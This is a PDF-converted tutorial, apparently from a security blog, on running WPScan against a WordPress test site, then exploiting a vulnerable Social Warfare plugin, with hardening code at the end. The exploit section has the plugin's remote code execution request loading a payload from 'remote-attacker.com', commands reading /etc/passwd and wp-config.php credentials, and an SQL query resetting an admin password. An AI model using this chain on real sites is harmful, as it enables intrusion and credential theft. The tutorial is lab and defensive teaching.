Wpscan Usage Example (Enumeration + Exploit) : Cyberpunk Vulnerability Analysis
Wpscan Usage Example (Enumeration + Exploit) : Cyberpunk Vulnerability Analysis
Wpscan Usage Example (Enumeration + Exploit) : Cyberpunk Vulnerability Analysis
Exploit]
CyberPunk Vulnerability Analysis
Introduction
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
WordPress is the main target when it comes to hackers attacks. Around 30% of
websites worldwide are using it, and based on some rough estimates, at least
60% of them are vulnerable to attacks. In this article we’re going to show you how
much WordPress can be vulnerable through WPscan usage example.
WPScan is a black box WordPress vulnerability scanner written for security professionals
and blog maintainers to test the security of their sites.
$ wpscan --update
If already running:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Build and run:
Get a shell:
And you’re on your way. Find some vulnerable plugins or themes and let the
games begin. This is a great docker option for exploring WP’s vulnerabilities.
--proxy PROTOCOL://IP:PORT
--proxy-auth LOGIN:PASSWORD
--wp-content-dir : Set custom content dir
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
--wp-plugins-dir : Set custom plugin dir
--plugins-detection MODE : Modes: mixed, passive, aggressive
-P, --password FILE-PATH : List of password to use during password attack
-U, --usernames LIST : List of usernames to use during password attack
vp : vulnerable plugins
ap : all plugins
p : plugins
vt : vulnerable themes
at : all themes
t : themes
tt : timthumbs
cb : config backups
dbe : Db exports
u : user IDs
m : Media IDs range
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
As a more specific example, on our playground we’re going to use aggresive
vulnerable plugin detection:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
Interesting Finding(s):
[+] http://playground.cyberpunk.rs:81/
| Interesting Entries:
| - Server: Apache/2.4.7 (Ubuntu)
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
| - X-Powered-By: PHP/5.5.9-1ubuntu4.27
| - SecretHeader: SecretValue
| - via: Squid 1.0.0
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://playground.cyberpunk.rs:81/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
...
[+] Enumerating All Plugins (via Aggressive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
...
[+] loginpress
| Location: http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/
| Last Updated: 2019-03-07T20:20:00.000Z
| Readme: http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme
| [!] The version is out of date, the latest version is 1.1.21
| [!] Directory listing is enabled
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: LoginPress <= 1.1.15 - Authenticated Blind SQL Injection
| Fixed in: 1.1.16
| References:
| - https://wpvulndb.com/vulnerabilities/9217
| - https://plugins.trac.wordpress.org/changeset/1988326/loginpress
|
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
| Version: 1.1.10 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme.txt
..
[+] social-warfare
| Location: http://playground.cyberpunk.rs:81/wp-content/plugins/social-warfare/
| Last Updated: 2019-04-23T16:53:00.000Z
| Readme: http://playground.cyberpunk.rs:81/wp-content/plugins/social-warfare/re
| [!] The version is out of date, the latest version is 3.5.4
| [!] Directory listing is enabled
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
| Fixed in: 3.5.3
| References:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
A short info on symbols:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
WPScan offers a bunch of references related to this/specific vulnerability and
exploit. For this “Social Warfare” on one of the references (wpvulndb) we can see
that this vulnerability/exploit affects all versions up to 3.5.2, and we can even see
a proof of concept (PoC):
“Unauthanticated remote code execution has been discovered in functionality that handles
settings import”.
Beautiful, cool, let’s try it. We’re going to use “ remote-attacker.com ” to place our
payload, so:
http://playground.cyberpunk.rs:81/wp-admin/admin-post.php?swp_debug=load_options&
<pre>system('cat /etc/passwd')</pre>
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin b
Damn, that’s messed up. We’re in control, but how much. Let’s see who we are.
Replace previous payload.txt with;
<pre>system('whoami')</pre>
Result:
www-data
Good for them, at least it’s not root.. yet. Since, we know this is wordpress, let’s
look for classic path of “wp-config.php”, try to read it with payload.txt:
Result:
Yeah, bit**. That’s what we’re talking about, slowly working your way towards the
dark side & unlimited power !!!
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Just to be sure, we’re going to check if those credentials work with the DB. Blog
might be situated elsewhere, some other path or vhost, you might need to explore
the system a bit. For now, replace payload once again:
Yes, we’re definitely in. With MySQL access, we can alter some user’s wp
password (cp_admin), add new wp user (admin), etc.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
UPDATE wp_users SET user_pass = MD5('yourpass') WHERE user_login='username';
We can most likely use some priviledge escalation techniques to get root access
to the system itself. We’ll cover that with some other article, later on.
Defense / Prevention
To defend from plugin, theme or user enumerations, there are some options and
techniques you can use.
Note: We don’t agree, but based on some source user enumeration is not considered to be
a vulnerability (source).
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
User enumeration is gathered from different sources:
[+] cyberpunk
| Detected By: Rss Generator (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
You can try disabling some of those sources and different segments, by adding
this to your theme functions.php :
// REMOVE RSSs
function wpb_disable_feed() {
wp_die( __('No feed available,please visit our '. get_bloginfo('url') .'),"Info"
}
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
unset( $endpoints['/wp/v2/users/(?P[\d]+)'] );
}
return $endpoints;
});
//PREVENT /author=
if (!is_admin()) {
// default URL format
if (preg_match('/author=([0-9])/i', $_SERVER['QUERY_STRING']))
wp_die( 'Author archives have been disabled.', "Info", 200 );
add_filter('redirect_canonical', 'custom_check_enum', 10, 2); }
function custom_check_enum($redirect, $request) {
// permalink URL format
if (preg_match('/\?author=([0-9])(\/*)/i', $request))
wp_die( 'Author archives have been disabled.', "Info", 200 );
else
return $redirect;
}
or
function custom_block_user_enum() {
if ( is_admin() ) return;
$author_by_id = ( isset( $_REQUEST['author'] ) && is_numeric( $_REQUEST['aut
if ( $author_by_id )
wp_die( 'Author archives have been disabled.', "Info", 200 );
}
add_action( 'template_redirect', 'custom_block_user_enum' );
or simply:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
wp_die( 'Author archives have been disabled.', "Info", 200 );
}
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
location ^~ /wp-admin/upgrade.php{
#allow 127.0.0.1;
deny all;
error_page 403 =404 /;
}
$ truncate -s +1 loading.gif
Or altering all JS and CSS files by adding single space at the end:
$ find /var/www/wordpress/ -name *.js -exec sh -c "printf ' ' >> {}" \;
$ find /var/www/wordpress/ -name *.css -exec sh -c "printf ' ' >> {}" \;
It works, but it might be too much for some people. WordPress update would most likely
overwrite such changes, so you’ll have to set some script to run everytime wordpress gets
updated.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
If you’re paranoid you can disable REST API entirely, allowing only specific IPs to
access it:
Disable XMLRPC
The XMLRPC is useful, but can be used against you for:
Intel gathering
Port scanning
DoS attacks
Router hacking
[+] https://www.cyberpunk.rs/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_s
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingbac
location ^~ /xmlrpc.php {
#allow 1.2.3.4;
deny all;
error_page 403 =404 / ;
}
Now, if you use XMLRPC to automate some tasks (update/add/remove users/post), you
might consider adding some “whitelisted” ips in allow section.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
return $src;
}
add_filter( 'style_loader_src', 'remove_cssjs_ver', 1000 );
add_filter( 'script_loader_src', 'remove_cssjs_ver', 1000 );
This security through obscurity approach is not the the best strategy, but at least
you can make some attacker’s life a bit more difficult. It’s hard to cover all of
those “holes”, but if you go through with it, WPScan would end up with:
People use different things to prevent such enumerations and approach from different
sides (apache/htaccess or nginx or functions.php ). Benefits vary. It’s up to you. Here we
can’t possibly cover everything used by this scanner or attackers, nor how to defend from
them, so we’re going to cover this subject more extensively later on.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Conclusion
WPScan guys did a great job with this tool. Depending on what your goal is,
defending your blog or attacking one you might need different level of skill set.
On the other hand, if you’re trying to hack some wordpress, you might need more.
WPScan guys made this process look easy (frequently is), but it’s not always so.
Sometimes you’ll need to have a thorough understanding of WP/PHP, Linux, DBs
in order to compromise the system and fully understand vulnerability/exploit at
hand.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Facebook Twitter LinkedIn
I N F O R M AT I O N G AT H E R I N G VULNERABILITY ANALYSIS I N F O R M AT I O N G AT H E R I N G
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD